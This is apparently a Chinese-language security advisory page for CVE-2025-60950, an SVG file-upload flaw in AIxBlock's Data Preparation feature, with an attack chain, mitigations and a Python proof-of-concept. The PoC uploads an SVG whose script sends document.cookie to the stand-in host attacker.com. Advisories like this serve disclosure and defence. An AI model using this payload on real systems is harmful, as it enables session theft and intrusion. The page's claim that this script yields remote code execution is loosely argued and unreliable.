CVE-2025-60950 AIxBlock Data Preparation任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-60950

漏洞类型

任意文件上传/远程代码执行

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AIxBlock

漏洞概述

CVE-2025-60950是AIxBlock平台中存在的一个任意文件上传漏洞。该漏洞位于AIxBlock的Data Preparation（数据准备）功能中，攻击者可以通过上传精心构造的SVG文件来实现任意代码执行。AIxBlock是一个开源的AI开发平台，用于数据准备和模型训练等任务。由于该漏洞无需认证即可利用，但需要用户交互（如点击上传按钮），因此CVSS评分为6.1，属于中等严重程度。攻击者可以利用此漏洞上传包含恶意JavaScript或SVG脚本的文件，进而在服务器上执行任意代码，可能导致数据泄露、服务中断或进一步横向移动。漏洞影响版本为commit f60975及其之前版本，建议用户尽快升级到最新修复版本。

技术细节

该漏洞源于AIxBlock的Data Preparation功能对上传文件的验证不足。攻击者可以利用SVG文件的特性绕过常规的文件类型检查。SVG（可缩放矢量图形）是一种XML格式的矢量图形文件，支持内嵌JavaScript代码。当攻击者上传一个包含恶意脚本的SVG文件时，服务器未能正确过滤或限制SVG文件中的脚本执行。攻击者可以通过以下方式利用：1) 构造包含<script>标签或事件处理器（如onload）的SVG文件；2) 通过Data Preparation功能上传该SVG文件；3) 当其他用户访问或触发该文件时，嵌入的脚本将在受害者浏览器或服务器上下文中执行。由于SVG文件可以直接引用外部资源，攻击者还可以利用此漏洞进行SSRF攻击或窃取敏感信息。修复方案应在服务器端对上传文件进行严格的类型检查、文件内容分析和存储隔离。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标AIxBlock平台，确认其版本是否包含commit f60975或更早版本

STEP 2

步骤2: 构造恶意文件

攻击者创建一个包含恶意JavaScript代码的SVG文件，利用SVG支持内嵌脚本的特性

STEP 3

步骤3: 诱导用户交互

攻击者通过社会工程学手段诱导具有上传权限的用户访问恶意链接或点击上传按钮

STEP 4

步骤4: 文件上传

受害者通过AIxBlock的Data Preparation功能上传恶意SVG文件，服务器未进行充分验证

STEP 5

步骤5: 触发执行

当其他用户访问或渲染该SVG文件时，嵌入的恶意脚本在用户浏览器或服务器上下文中执行

STEP 6

步骤6: 权限提升与横向移动

攻击者利用执行环境获取敏感信息（如会话Cookie、API密钥）或进一步渗透内网系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-60950 PoC - Malicious SVG File Upload # Target: AIxBlock Data Preparation Function # This PoC demonstrates arbitrary file upload leading to XSS/Code Execution import requests import json # Configuration TARGET_URL = "http://target-ai-xblock.com" # Replace with actual target UPLOAD_ENDPOINT = f"{TARGET_URL}/api/data-preparation/upload" FILE_PATH = "payload.svg" # Malicious SVG payload for XSS and potential RCE MALICIOUS_SVG = '''<?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg"> <script type="text/javascript"> // XSS payload - steals cookies/session alert(document.cookie); // Data exfiltration fetch('https://attacker.com/steal?data=' + encodeURIComponent(document.cookie)); // Potential RCE if server processes SVG var xhr = new XMLHttpRequest(); xhr.open('POST', 'https://attacker.com/upload', true); xhr.send(window.location.href); </script> <circle cx="100" cy="100" r="50" fill="red" onload="alert('XSS via SVG')"/> </svg> ''' # Create malicious SVG file with open(FILE_PATH, 'w') as f: f.write(MALICIOUS_SVG) # Upload the malicious file files = { 'file': (FILE_PATH, MALICIOUS_SVG, 'image/svg+xml') } data = { 'type': 'data_preparation', 'description': 'Malicious SVG upload test' } try: response = requests.post( UPLOAD_ENDPOINT, files=files, data=data, timeout=30 ) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") if response.status_code == 200: result = response.json() print(f"[+] File uploaded successfully!") print(f"[+] File URL: {result.get('url', 'Check response')}") print(f"[+] Access the file to trigger the payload") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") # Alternative PoC using curl: # curl -X POST -F "[email protected]" -F "type=data_preparation" \ # http://target-ai-xblock.com/api/data-preparation/upload

影响范围

AIxBlock commit f60975及之前版本

防御指南

临时缓解措施

临时缓解措施：在Web服务器配置中添加Content-Security-Policy响应头，禁止SVG文件执行脚本；将上传目录设置为不可执行，限制文件访问权限；使用WAF（Web应用防火墙）规则阻止恶意SVG文件上传请求；定期检查上传目录，及时清除可疑文件。同时建议限制Data Preparation功能的使用权限，避免未授权用户访问。